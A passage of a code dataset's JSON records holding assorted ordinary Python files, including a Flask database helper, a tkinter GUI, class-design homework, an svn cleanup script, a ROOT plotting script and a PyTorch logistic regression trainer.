they are concatenated onto the original list\n\nmiLista.remove(\"emelina\")  # to remove an element from the list\n\nmiLista.pop()  # to delete the last element of a list\n\nprint(miLista.index(5))  # index() returns the position of a value (5 is at index 1 here)\n\n\n#-------------------------------------------\n\nmiLista2=[\"Sandre\",\"Lucia\"]\n\nmiLista3=miLista+miLista2  # to concatenate lists\n\nprint(miLista3[:])","sub_path":"listas(arrays).py","file_name":"listas(arrays).py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"228308664","text":"class Solution:\n    def minCost(self, costs: List[List[int]]) -> int:\n        n = len(costs)\n        if n == 0:\n            return 0\n        f = [[0] * 3 for _ in range(n+1)]\n        for i in range(1, n + 1):\n            for j in range(3):\n                f[i][j] = sys.maxsize\n                for k in range(3):\n                    if j != k:\n                        f[i][j] = min(f[i][j], f[i - 1][k] + costs[i-1][j])\n\n        return min(f[len(costs)][0], min(f[len(costs)][1], f[len(costs)][2]))\n","sub_path":"Chapter07_dynamicProgramming/lc256.py","file_name":"lc256.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"258979546","text":"import sqlite3\n\nimport click\nfrom flask import current_app, g\nfrom flask.cli import with_appcontext\n\n\ndef get_db():\n    # g is a special object, unique for each request. Used to store data that multiple functions might need. \n    # Reused if get_db() is called more than once in the same request\n    if 'db' not in g:\n        # sqlite3.connect() establishes a connection to the file pointed at by the DATABASE config key\n        g.db = sqlite3.connect(\n            # current_app is a special object that points to the Flask app handling the request\n            current_app.config['DATABASE'],\n            detect_types=sqlite3.PARSE_DECLTYPES\n        )\n        # sqlite3.Row tells connection to return rows that behave like dicts\n        g.db.row_factory = sqlite3.Row\n\n    return g.db\n\ndef close_db(e=None):\n    # check if connection was created\n    db = g.pop('db', None)\n\n    # if db exists, close it\n    if db is not None:\n        db.close()\n\ndef init_db():\n    db = get_db()\n\n    # open_resource opens file relative to flaskr package\n    with current_app.open_resource('schema.sql') as f:\n        db.executescript(f.read().decode('utf8'))\n\n# click.command defines command line command called 'init-db' that calls init_db_command()\n@click.command('init-db')\n@with_appcontext\ndef init_db_command():\n    \"\"\"Clear the existing data and create new tables.\"\"\"\n    init_db()\n    click.echo('Initialized the database.')\n\n\ndef init_app(app):\n    # tells Flask to call close_db() when cleaning up\n    app.teardown_appcontext(close_db)\n    # adds new command that can be called with the `flask` command\n    app.cli.add_command(init_db_command)","sub_path":"flaskr/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"14409499","text":"from platform import system\nimport json\n# from tkinter import Tk, Label, Button, Grid, grid_rowconfigure, Entry, IntVar, END, W, E, filedialog, Toplevel\nfrom tkinter import *\nfrom tkinter import Entry, filedialog\n\n\nclass PyDoc:\n\n    def __init__(self, master):\n        self.master = master\n        master.title(\"Requests\")\n\n        self.label = Label(master, text=\"Text\")\n        self.filepath = \"\"\n\n        self.lambda_button = Button(master, text=\"lambda\", command=lambda: self.update(\"lambda\"))\n        self.open_button = Button(master, text=\"open\", 
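The three-colour painting recurrence in lc256 above only ever reads the previous row, so the table collapses to three running values. A constant-space sketch of the same recurrence (sample costs are made up):

def min_cost(costs):
    # r/g/b hold the cheapest total when the previous house took that colour.
    if not costs:
        return 0
    r, g, b = costs[0]
    for cr, cg, cb in costs[1:]:
        # Each colour may follow either of the other two colours.
        r, g, b = cr + min(g, b), cg + min(r, b), cb + min(r, g)
    return min(r, g, b)

print(min_cost([[17, 2, 17], [16, 16, 5], [14, 3, 19]]))  # 10 (green, blue, green)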
command=lambda: self.update(\"open\"))\n self.viewing_session_button = Button(master, text=\"Viewing Session\", command=lambda: self.update(\"Viewing Session\"))\n # LAYOUT\n\n self.label.grid(row=0, column=0, sticky=W)\n self.viewing_session_button.grid(row=2, column=3)\n # self.entry.grid(row=1, column=0, columnspan=3, sticky=W+E)\n\n self.open_button.grid(row=1, column=2)\n\n def update(self, method):\n if method == \"open\":\n initialdir = \"/\" if (system() == \"Linux\") else \"C:/\"\n\n self.filepath = filedialog.askopenfilename(initialdir=initialdir, filetypes=((\"jpeg files\",\"*.jpg\"),(\"all files\",\"*.*\")))\n elif method == \"Viewing Session\":\n with open('viewing_session.json', 'r') as file:\n data = json.load(file)\n Request_Window(Toplevel(self.master), data=data)\n else:\n pass\n\n\nclass Request_Window(Grid):\n\n def __init__(self, master, title=\"New Window\", data={}):\n\n self.master = master\n master.title = title\n self.vcmd = master.register(self.validate)\n self.count = 0\n self.labels = {}\n self.entries = {}\n self.gen_window_from_json(data)\n\n def gen_window_from_json(self, raw_data, depth=0):\n for item in raw_data:\n self.count += 1\n if type(raw_data[item]) is dict:\n self.labels[item] = self.new_label(item, depth)\n self.gen_window_from_json(raw_data[item], depth + 1)\n\n else:\n self.labels[item] = self.new_label(item, depth)\n self.entries[item] = self.new_entry(raw_data[item], depth)\n\n def new_label(self, item=\"\", depth=0):\n new_label = Label(self.master, text=item)\n new_label.grid(row=self.count, column=depth, sticky='W')\n return new_label\n\n def new_entry(self, item=\"\", depth=0):\n new_entry = Entry(self.master, validate=\"key\", validatecommand=(self.vcmd, '%P'))\n new_entry.grid(row=self.count, column=depth + 1, sticky='W')\n new_entry.insert(index=0, string=item)\n entered_text = new_entry.get()\n print(entered_text)\n # new_entry.insert(index=0, string=\"newdata\")\n return new_entry\n\n def validate(self, new_text):\n if not new_text: # the field is being cleared\n self.data = 0\n return True\n\n try:\n self.data= new_text\n return True\n except ValueError:\n return False\n\n\nroot = Tk()\nPyDoc = PyDoc(root)\nroot.mainloop()\n\n","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"135642404","text":"class Student:\n def __init__(self, name, surname, gender):\n self.name = name\n self.surname = surname\n self.gender = gender\n self.finished_courses = []\n self.courses_in_progress = []\n self.grades = {}\n\n def average_rating_course(self, course):\n crutch = 0\n crutch_2 = []\n for search in self.grades[course]:\n crutch += search\n crutch_2.append(search)\n return float(crutch / len(crutch_2))\n\n def average_rating(self):\n crutch = 0\n crutch_2 = []\n for search in self.grades:\n for search_2 in self.grades[search]:\n crutch += search_2\n crutch_2.append(search_2)\n return float(crutch / len(crutch_2))\n\n def __lt__(self, other):\n if isinstance(other, Student):\n return self.average_rating() < other.average_rating()\n else:\n return \"Ошибка\"\n\n def rating_comparison(self, student):\n if isinstance(student, Student):\n if student < self:\n return f\"{self.name} {self.surname}\"\n elif self < student:\n return f\"{student.name} {student.surname}\"\n else:\n return \"средний бал равен\"\n else:\n return \"ошибка\"\n\n def __str__(self):\n return f\"Имя: {self.name} \\n\" \\\n f\"Фамилия: 
{self.surname} \\n\" \\\n f\"Средняя оценка за лекции: {self.average_rating()} \\n\" \\\n f\"Курсы в процессе изучения: {str(self.courses_in_progress)[1:-1]} \\n\" \\\n f\"Завершенные курсы: {str(self.finished_courses)[1:-1]}\"\n\n\nclass Mentor:\n def __init__(self, name, surname):\n self.name = name\n self.surname = surname\n self.courses_attached = []\n\n\nclass Lecturer(Mentor):\n def __init__(self, name, surname):\n super().__init__(name, surname)\n self.grades = {}\n\n def average_rating(self):\n crutch = 0\n crutch_2 = []\n for search in self.grades:\n for search_2 in self.grades[search]:\n crutch += search_2\n crutch_2.append(search_2)\n return float(crutch / len(crutch_2))\n\n def average_rating_course(self, course):\n crutch = 0\n crutch_2 = []\n for search in self.grades[course]:\n crutch += search\n crutch_2.append(search)\n return float(crutch / len(crutch_2))\n\n def __lt__(self, other):\n if isinstance(other, Lecturer):\n return self.average_rating() < other.average_rating()\n else:\n return \"Ошибка\"\n\n def rating_comparison(self, lecturer):\n if isinstance(lecturer, Lecturer):\n if lecturer < self:\n return f\"{self.name} {self.surname}\"\n elif self < lecturer:\n return f\"{lecturer.name} {lecturer.surname}\"\n else:\n return \"средний бал равен\"\n else:\n return \"ошибка\"\n\n def __str__(self):\n return f\"Имя: {self.name} \\n\" \\\n f\"Фамилия: {self.surname} \\n\" \\\n f\"Средняя оценка за лекции: {self.average_rating()}\"\n\n def rate_class(self, student, course, grade):\n if isinstance(student, Student) and course in self.courses_attached and course in student.courses_in_progress:\n if course in self.grades:\n self.grades[course] += [grade]\n else:\n self.grades[course] = [grade]\n else:\n return 'Ошибка'\n\n\nclass Reviewer(Mentor):\n def __init__(self, name, surname):\n super().__init__(name, surname)\n\n def rate_hw(self, student, course, grade):\n if isinstance(student, Student) and course in self.courses_attached and course in student.courses_in_progress:\n if course in student.grades:\n student.grades[course] += [grade]\n else:\n student.grades[course] = [grade]\n else:\n return 'Ошибка'\n\n def __str__(self):\n return f\"Имя: {self.name} \\n\" \\\n f\"Фамилия: {self.surname}\"\n\n\ndef all_students_average_rating(students, course):\n crutch = []\n for search in students:\n if isinstance(search, Student):\n crutch.append(search.average_rating_course(course))\n else:\n return \"Ошибка\"\n crutch.sort()\n return crutch[-1]\n\n\ndef all_lecturer_average_rating(lecturers, course):\n crutch = []\n for search in lecturers:\n if isinstance(search, Lecturer):\n crutch.append(search.average_rating_course(course))\n else:\n return \"Ошибка\"\n crutch.sort()\n return crutch[-1]\n\n\nfirst_reviewer = Reviewer(\"Mr\", \"Check\")\n\nsecond_reviewer = Reviewer(\"Miss\", \"Check\")\n\nfirst_lecturer = Lecturer(\"Mr\", \"Teacher\")\nfirst_lecturer.grades = {\"Python\": [3, 4, 5, 6], \"Git\": [4]}\n\nsecond_lecturer = Lecturer(\"Miss\", \"Teacher\")\nsecond_lecturer.grades = {\"Python\": [7, 8, 10, 10], \"Git\": [9]}\n\nfirst_student = Student('Ruoy', 'Eman', 'your_gender')\nfirst_student.finished_courses = [\"Введение в программирование\"]\nfirst_student.courses_in_progress = [\"Python\", \"Git\"]\nfirst_student.grades = {\"Python\": [3, 4, 5, 6], \"Git\": [4]}\n\nsecond_student = Student(\"Hidetaka\", \"Miyazaki\", \"your_gender\")\nsecond_student.finished_courses = [\"Введение в программирование\"]\nsecond_student.courses_in_progress = [\"Python\", 
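The hand-rolled accumulation loops in average_rating above can be expressed with the standard statistics module; a small equivalent sketch (grade data is made up):

from statistics import mean
from itertools import chain

grades = {"Python": [3, 4, 5, 6], "Git": [4]}

# Average over one course, and over all grades pooled across courses.
course_avg = mean(grades["Python"])
overall_avg = mean(chain.from_iterable(grades.values()))
print(course_avg, overall_avg)  # 4.5 4.4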
\"Git\"]\nsecond_student.grades = {\"Python\": [1, 1, 1, 0], \"Git\": [2]}\n\nfirst_lecturer.rate_class(first_student, 'Python', 10)\nfirst_reviewer.rate_hw(first_student, 'Python', 10)\n\nstudents_list = [first_student, second_student]\nlecturer_list = [first_lecturer, second_lecturer]\n\n\nprint(first_lecturer.grades)\nprint(first_student.grades)\nprint(first_student)\nprint(first_lecturer)\nprint(first_reviewer)\nprint(first_student.rating_comparison(second_student))\nprint(first_lecturer.rating_comparison(second_lecturer))\nprint(all_students_average_rating(students_list, \"Python\"))\nprint(all_lecturer_average_rating(lecturer_list, \"Python\"))\n","sub_path":"3adanie 4.py","file_name":"3adanie 4.py","file_ext":"py","file_size_in_byte":6263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"172912019","text":"from api.controllers.user.userService import UserService\nimport unittest\nclass UserServiceTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n dictMock= {\n \"nome\": \"a\",\n \"email\": \"a\",\n \"telefone\": \"a\",\n \"telefone2\": \"a\",\n \"nome_empresa\": \"a\",\n \"cpf_cnpj\": \"a\",\n \"data_nascimento\": \"1995-06-12\",\n \"sexo\": \"M\",\n \"senha\": \"a\",\n \"login\": \"a\"\n } \n cls.dictMock=dictMock\n \n\n @classmethod\n def tearDownClass(cls):\n cls.dictMock=None\n\n def test_payload_is_dict(self):\n self.assertTrue(UserService().validateTypePayload(type(self.dictMock)),\"payload deve ser um json\")\n\n def test_validate_payload(self):\n self.assertTrue(UserService().createUser(self.dictMock),\"payload nao pode ter campo vazio\")\n","sub_path":"apiTests/userServiceTest.py","file_name":"userServiceTest.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"140747129","text":"import sqlite3\nimport datetime\nimport time\nfrom bot_constant import FORWARD_LIST\nimport logging\n\nlogger = logging.getLogger(\"CTB.\" + __name__)\n\n\nclass MessageDB:\n def __init__(self, db_name: str):\n self.conn = sqlite3.connect(db_name, check_same_thread=False)\n self.cursor = self.conn.cursor()\n for idx, forward in enumerate(FORWARD_LIST):\n table_name = '_' + str(idx)\n self.cursor.execute(f\"SELECT count(*) FROM sqlite_master WHERE type='table' AND name='{table_name}';\")\n result = self.cursor.fetchall()\n if result[0][0]:\n pass\n else:\n self.cursor.execute(f\"create table {table_name} (tg_message_id int primary key,\"\n f\"qq_message_id int, qq_number int, timestamp int)\")\n self.conn.commit()\n\n def append_message(self, qq_message_id: int,\n tg_message_id: int,\n forward_index: int,\n qq_number: int):\n \"\"\"\n append qq message list to database\n :param qq_message_id: QQ message id\n :param tg_message_id: Telegram message id\n :param forward_index: forward index\n :param qq_number: If from QQ, then QQ sender's number. 
If from Telegram, then 0 (used for recall)\n :return:\n \"\"\"\n table_name = '_' + str(forward_index)\n timestamp = int(time.mktime(datetime.datetime.now().timetuple()))\n logger.debug(f'append tg_msg_id:{tg_message_id}, qq_msg_id:{qq_message_id}, '\n f'qq_num:{qq_number}, time:{timestamp} to {table_name}')\n\n # find if already exists\n self.cursor.execute(f\"select * from '{table_name}' where tg_message_id = ?\", (tg_message_id,))\n result = self.cursor.fetchall()\n if len(result): # if exists, update record\n self.cursor.execute(\n f\"update '{table_name}' set qq_message_id=?, qq_number=?, timestamp=? where tg_message_id=?;\",\n (qq_message_id, qq_number, timestamp, tg_message_id))\n else: # if not, create record\n self.cursor.execute(f\"insert into '{table_name}' (tg_message_id, qq_message_id, qq_number, timestamp)\"\n f\"values (?, ?, ?, ?)\",\n (tg_message_id, qq_message_id, qq_number, timestamp))\n self.conn.commit()\n\n def retrieve_message(self, tg_message_id: int,\n forward_index: int):\n \"\"\"\n get specific record\n :param tg_message_id:\n :param forward_index:\n :return:\n \"\"\"\n table_name = '_' + str(forward_index)\n self.cursor.execute(f\"select * from '{table_name}' where tg_message_id = ?\", (tg_message_id,))\n result = self.cursor.fetchall()\n if len(result):\n return result[0]\n else:\n return None\n\n def delete_message(self, tg_message_id: int,\n forward_index: int):\n \"\"\"\n delete record\n :param tg_message_id:\n :param forward_index:\n :return:\n \"\"\"\n table_name = '_' + str(forward_index)\n self.cursor.execute(f\"delete from {table_name} where tg_message_id=?;\", (tg_message_id,))\n self.conn.commit()\n\n def purge_message(self):\n \"\"\"\n delete outdated records\n :return:\n \"\"\"\n for idx, forward in enumerate(FORWARD_LIST):\n table_name = '_' + str(idx)\n purge_time = int(time.mktime((datetime.datetime.now() - datetime.timedelta(weeks=2)).timetuple()))\n self.cursor.execute(f\"delete from {table_name} where timestamp < ?;\", (purge_time,))\n self.conn.commit()\n\n def __del__(self):\n self.conn.close()\n","sub_path":"main/message_persistence.py","file_name":"message_persistence.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"111467420","text":"import os\nimport re\nimport shlex\nfrom subprocess import *\n\n\ndef remove_file(p):\n print('remove {}'.format(p))\n os.remove(p)\n\n\ndef remove_dir(p):\n print('remove directory {}'.format(p))\n os.rmdir(p)\n\n\ndef remove_files(path):\n path = os.path.join(os.path.abspath('.'), path)\n if not os.path.isdir(path):\n remove_file(path)\n return\n files = os.listdir(path)\n for x in files:\n fullpath = os.path.join(path, x)\n if os.path.isfile(fullpath):\n remove_file(fullpath)\n elif os.path.isdir(fullpath):\n remove_files(fullpath)\n remove_dir(path)\n\n\ndef remove_unversioned_files(path):\n unversioned = re.compile('^ ?[\\?ID] *[1-9 ]*[a-zA-Z]* +(.*)')\n cmd = shlex.split('svn status')\n cmd.append(path)\n (out, err) = Popen(cmd, stdout=PIPE).communicate()\n for l in out.splitlines():\n match = unversioned.match(l)\n if match:\n remove_files(match.group(1))\n\n\ndef svn(cmd, path):\n cmd = shlex.split(cmd)\n cmd.append(path)\n Popen(cmd).communicate()\n \n\ndef revert(path):\n svn('svn revert -R', path)\n\n\ndef update(path):\n svn('svn update', path)\n\n\ndef checkout(path):\n svn('svn checkout', path)\n\n\ndef run(action, path):\n path = os.path.dirname(path)\n if action in ['up', 'update']:\n 
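The status-line regex in remove_unversioned_files can be exercised on canned svn status output; a quick sketch (the sample lines are invented):

import re

# Same pattern as above: a '?', 'I' or 'D' status column followed by a path.
unversioned = re.compile(r'^ ?[\?ID] *[1-9 ]*[a-zA-Z]* +(.*)')

sample = """? build/output.log
D       src/old_module.py
M       src/kept.py"""

for line in sample.splitlines():
    match = unversioned.match(line)
    if match:
        print("would remove:", match.group(1))
# would remove: build/output.log
# would remove: src/old_module.py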
update(path)\n elif action == 'revert':\n revert(path)\n elif action == 'remove_unversioned_files':\n remove_unversioned_files(path)\n elif action in ['co', 'checkout']:\n checkout(path)\n else:\n raise Exception('[ERROR]: unknown actions')\n","sub_path":"plugins/svn.py","file_name":"svn.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"70143244","text":"#!/usr/bin/env python\n\"\"\"\nPlot systematic uncertainty\n\"\"\"\n\n__author__ = \"Maoqiang JING \"\n__copyright__ = \"Copyright (c) Maoqiang JING\"\n__created__ = \"[2020-11-26 Thr 21:43]\"\n\nimport ROOT\nfrom ROOT import TCanvas, gStyle, TGraphErrors, TF1\nfrom ROOT import TFile, TH1F, TLegend, TPaveText\nfrom array import array\nimport sys, os\nimport logging\nfrom math import *\nlogging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - %(levelname)s- %(message)s')\ngStyle.SetOptTitle(0)\ngStyle.SetOptTitle(0)\n\ndef usage():\n sys.stdout.write('''\nNAME\n plot_diff.py\n\nSYNOPSIS\n ./plot_diff.py\n\nAUTHOR\n Maoqiang JING \n\nDATE\n November 2020\n\\n''')\n\ndef set_pavetext(pt):\n pt.SetFillStyle(0)\n pt.SetBorderSize(0)\n pt.SetTextAlign(10)\n pt.SetTextSize(0.06)\n\ndef set_graph_style(gr, xtitle, ytitle):\n gr.GetXaxis().SetNdivisions(509)\n gr.GetYaxis().SetNdivisions(504)\n gr.SetLineWidth(2)\n gr.GetXaxis().SetTitleSize(0.06)\n gr.GetXaxis().SetTitleOffset(1.1)\n gr.GetXaxis().SetLabelOffset(0.01)\n gr.GetXaxis().SetLabelSize(0.05)\n gr.GetXaxis().SetRangeUser(4.17, 4.70)\n gr.GetYaxis().SetTitleSize(0.06)\n gr.GetYaxis().SetTitleOffset(0.9)\n gr.GetYaxis().SetLabelOffset(0.01)\n gr.GetYaxis().SetLabelSize(0.05)\n gr.GetXaxis().SetTitle(xtitle)\n gr.GetXaxis().CenterTitle()\n gr.GetYaxis().SetTitle(ytitle)\n gr.GetYaxis().CenterTitle()\n gr.SetMarkerColor(1)\n gr.SetMarkerStyle(21)\n\ndef set_canvas_style(mbc):\n mbc.SetFillColor(0)\n mbc.SetLeftMargin(0.15)\n mbc.SetRightMargin(0.15)\n mbc.SetTopMargin(0.1)\n mbc.SetBottomMargin(0.15)\n mbc.SetGrid()\n\ndef draw():\n N = 8\n ecms = array('f', N*[0])\n ecms_err = array('f', N*[0])\n factor = array('f', N*[0])\n factor_err = array('f', N*[0])\n path = './txts/sys_err_window_raw.txt'\n\n mbc = TCanvas('mbc', 'mbc', 800, 600)\n set_canvas_style(mbc)\n\n f = open(path, 'r')\n lines = f.readlines()\n count = 0\n sum_mean = 0\n sum_err = 0\n for line in lines:\n fargs = map(float, line.strip('\\n').strip().split())\n ecms[count] = fargs[0]\n ecms_err[count] = 0.0022\n factor[count] = fargs[1]\n factor_err[count] = fargs[2]\n sum_mean += fargs[1]\n sum_err += fargs[2]\n count += 1\n\n grerr = TGraphErrors(N, ecms, factor, ecms_err, factor_err)\n xtitle = 'E_{cms} (GeV)'\n ytitle = 'f^{RM(D^{+}#pi_{0}^{+}#pi_{0}^{-})}'\n set_graph_style(grerr, xtitle, ytitle)\n f = TF1('f', '[0]', ecms[0], ecms[1])\n grerr.Fit(f)\n chi2 = f.GetChisquare()\n ndf = f.GetNDF()\n F = f.GetParameter(0)\n F_err = f.GetParError(0)\n grerr.Draw('ap')\n\n pt = TPaveText(0.35, 0.65, 0.75, 0.85, \"BRNDC\")\n set_pavetext(pt)\n pt.Draw()\n line = 'f#pm#sigma_{f^{RM(D^{+}#pi_{0}^{+}#pi_{0}^{-})}} = ' + str(round(F, 3)) + '#pm' + str(round(F_err, 3))\n pt.AddText(line)\n line = '#chi^{2}/ndf = ' + str(round(chi2, 3)) + '/' + str(round(ndf, 3)) + ' = ' + str(round(chi2/ndf, 3))\n pt.AddText(line)\n line = '#Delta_{f^{RM(D^{+}#pi_{0}^{+}#pi_{0}^{-})}}/#sigma_{f^{RM(D^{+}#pi_{0}^{+}#pi_{0}^{-})}}=' + str(round((1 - F)/F_err, 3))\n pt.AddText(line)\n mbc.Update()\n\n if not os.path.exists('./figs/'):\n 
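Fitting a constant with TF1 as above is equivalent to an inverse-variance weighted mean, which gives a cheap cross-check of the fitted value, its error and the chi-square; a sketch with made-up points (numpy only, no ROOT):

import numpy as np

# Constant fit y = f with per-point errors sigma: the chi^2 minimiser is the
# inverse-variance weighted mean.
y = np.array([0.98, 1.03, 0.95, 1.01])
sigma = np.array([0.05, 0.04, 0.06, 0.05])

w = 1.0 / sigma**2
f_hat = np.sum(w * y) / np.sum(w)      # fitted constant
f_err = 1.0 / np.sqrt(np.sum(w))       # its uncertainty
chi2 = np.sum(((y - f_hat) / sigma) ** 2)
print(round(f_hat, 4), round(f_err, 4), round(chi2, 3))  # 1.0005 0.0242 1.457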
os.makedirs('./figs/')\n mbc.SaveAs('./figs/sys_err_window.pdf')\n\n if not os.path.exists('./txts/'):\n os.makedirs('./txts/')\n\n with open('./txts/f_rm_Dpipi.txt', 'w') as f_out:\n f_out.write(str(F) + '\\n')\n\n ecms = [4190, 4200, 4210, 4220, 4230, 4237, 4245, 4246, 4260, 4270, 4280, 4290, 4310, 4315, 4340, 4360, 4380, 4390, 4400, 4420, 4440, 4470, 4530, 4575, 4600, 4610, 4620, 4640, 4660, 4680, 4700, 4740, 4750, 4780, 4840, 4914, 4946]\n with open('./txts/sys_err_window.txt', 'w') as f_out:\n for ecm in ecms:\n out = str(ecm/1000.) + '\\t' + str(round(F_err*100, 1)) + '\\n'\n f_out.write(out)\n\n raw_input('Enter anything to end...')\n \nif __name__ == '__main__':\n draw()\n","sub_path":"python/sys_err/window/plot_diff.py","file_name":"plot_diff.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"26235465","text":"__author__ = 'jbjose'\n\nimport sys, StringIO, math\nimport asciitree\n\n\"\"\"\nGiven a number, print a tree of its factors.\n\nhttp://www.reddit.com/r/dailyprogrammer/comments/284uhh/6142014_challenge_166b_intermediate_prime_factor/\n\"\"\"\n\nclass Node(object):\n def __init__(self, name, children):\n self.name = name\n self.children = children\n\n def __str__(self):\n return self.name\n\ndef is_prime(n):\n \"\"\"Trial division method: Tests primality by testing if n is divisible by a prime number from 2 to ceil(sqrt(n))\"\"\"\n # past ceil(sqrt(n)), the factors are the same\n for i in range(2,int(math.ceil(math.sqrt(n)))+1):\n if not n % i:\n return False\n return True\n\ndef get_factors(n):\n while not is_prime(n):\n for i in range(2,n):\n if not n % i:\n n = n/i\n yield i, n\n break\n yield n, None\n\nif __name__ == \"__main__\":\n sys.stdin = StringIO.StringIO(\"1767150\")\n n = int(sys.stdin.readline().strip())\n root = Node(str(n),[])\n current_node = root\n for x,y in get_factors(n):\n if y is not None:\n current_node.children = [Node(str(y),[]), Node(str(x),[])]\n current_node = current_node.children[0]\n print(asciitree.draw_tree(root))","sub_path":"166.Intermediate.PrimeFactorTree.py","file_name":"166.Intermediate.PrimeFactorTree.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"58318133","text":"from flask import Flask,current_app,url_for\napp = Flask(__name__)\n@app.route('/')\ndef index():\n # 在视图函数内部可以直接访问current_app.name\n print(current_app.name) #context_demo\n return 'Hello World!'\n\n@app.route('/list/')\ndef my_list():\n return 'my_list'\n\n# 请求上下文\nwith app.test_request_context():\n # 手动推入一个请求上下文到请求上下文栈中\n # 如果当前应用上下文栈中没有应用上下文\n # 那么会首先推入一个应用上下文到栈中\n print(url_for('my_list'))\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"8/8-2/qingqiu/qingqiu02.py","file_name":"qingqiu02.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"26991890","text":"import torch\nfrom torch.nn import functional as f\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\ndef logistic_model(theta, x):\n a = torch.matmul(theta, x)\n return torch.sigmoid(a)\n\n\ndef get_loss(y_p, y_t):\n return -torch.mean(y_t * torch.log(y_p) + (1 - y_t) * torch.log(1 - y_p))\n\n\n# def getx(triplets, i):\n# x1_pre = torch.tensor([triplets[i][0]], device=device)\n# x1 = f.one_hot(x1_pre, 501)\n# x2_pre = torch.tensor([triplets[i][1]], device=device)\n# x2 = 
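The is_prime/get_factors pair in the prime-tree solution above can be simplified: dividing out the smallest divisor repeatedly yields the prime factorization directly, because any divisor found this way is necessarily prime. A compact sketch:

def prime_factors(n):
    # Smallest-divisor-first trial division; each d that divides n is prime.
    d = 2
    while d * d <= n:
        while n % d == 0:
            yield d
            n //= d
        d += 1
    if n > 1:
        yield n

print(list(prime_factors(1767150)))  # [2, 3, 3, 3, 5, 5, 7, 11, 17]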
f.one_hot(x2_pre, 501)\n# x3_pre = torch.tensor([triplets[i][2]], device=device)\n# x3 = f.one_hot(x3_pre, 501)\n# return torch.cat([x1, x2, x3], 1).float().t()\n\n\ndef getlist(infopen):\n lines = infopen.readlines()\n triplets = []\n ys = []\n for line in lines:\n nums = line.split()\n triplets.append([int(nums[0]), int(nums[1]), int(nums[2])])\n ys.append(int(nums[-1]))\n return triplets, ys\n\n\ndef OneHotProcessing(infile1, infile2, infile3, outfile):\n theta = torch.zeros(1, 501 * 3, device=device)\n infopen1 = open(infile1, 'r', encoding='utf-8')\n infopen2 = open(infile2, 'r', encoding='utf-8')\n infopen3 = open(infile3, 'r', encoding='utf-8')\n outfopen = open(outfile, 'w', encoding='utf-8')\n # lines = infopen1.readlines()\n # triplets_train = []\n # ys_train = []\n # for line in lines:\n # nums = line.split()\n # triplets_train.append([int(nums[0]), int(nums[1]), int(nums[2])])\n # ys_train.append(int(nums[-1]))\n # lines = infopen2.readlines()\n # triplets_verification = []\n # ys_verification = []\n # for line in lines:\n # nums = line.split()\n # triplets_verification.append([int(nums[0]), int(nums[1]), int(nums[2])])\n # ys_verification.append(int(nums[-1]))\n\n triplets_train, ys_train = getlist(infopen1)\n triplets_verification, ys_verification = getlist(infopen2)\n triplets_test, ys_test = getlist(infopen3)\n print(\"read in completed\")\n\n alpha = 0.02\n batch_size = 5000\n f1_list = []\n for e in range(100):\n for i in range(0, len(triplets_train), batch_size):\n x = torch.tensor(triplets_train[i:i + batch_size], device=device)\n length = len(triplets_train[i:i + batch_size])\n # print(x.size())\n x = f.one_hot(x, 501).float().reshape(length, 501 * 3).t()\n # print('x.size()=', x.size())\n # print('theta.size()=', theta.size())\n y_p = logistic_model(theta, x)\n # print(y_p)\n # print('y_p.size()=', y_p.size())\n y = torch.tensor(ys_train[i:i + batch_size], device=device)\n # print(y)\n # print('y.size()=', y.size())\n loss = torch.matmul((y_p - y), x.t())\n # print(loss)\n theta.data = theta.data - alpha * loss.data\n # print(theta.size())\n # print(theta)\n\n # 验证集验证模型可信度\n true_predictions = 0 # 预测1正确\n one_predictions = 0 # 预测1的个数\n true_original = 0 # 原有1的个数\n\n # i = random.randint(0, len(triplets_train) - 1)\n x = torch.tensor(triplets_verification, device=device)\n length = len(triplets_verification)\n x = f.one_hot(x, 501).float().reshape(length, 501 * 3).t()\n y_p = logistic_model(theta, x).cpu().numpy().tolist()\n # print(y_p)\n # print(y.size())\n for i in range(len(triplets_verification)):\n if (y_p[0][i] >= 0.5) and (ys_verification[i] == 1):\n true_predictions += 1\n if y_p[0][i] >= 0.5:\n one_predictions += 1\n if ys_verification[i] == 1:\n true_original += 1\n\n recall_rate = float(true_predictions) / float(true_original)\n precision_rate = float(true_predictions) / float(one_predictions)\n if recall_rate != 0 or precision_rate != 0:\n f1_measure = 2 * (recall_rate * precision_rate) / (recall_rate + precision_rate)\n else:\n f1_measure = 0.0\n\n f1_list.append([e, f1_measure])\n\n if e % 10 == 0:\n print(str(e) + ':')\n print(\"recall rate:\", recall_rate)\n print(\"precision_rate:\", precision_rate)\n print(\"f1 measure:\", f1_measure)\n for list in f1_list:\n outfopen.write(str(list[0]+1) + ' ' + str(list[1]) + '\\n')\n\n # 测试集测试模型训练效果\n true_predictions = 0 # 预测1正确\n one_predictions = 0 # 预测1的个数\n true_original = 0 # 原有1的个数\n\n # i = random.randint(0, len(triplets_train) - 1)\n x = 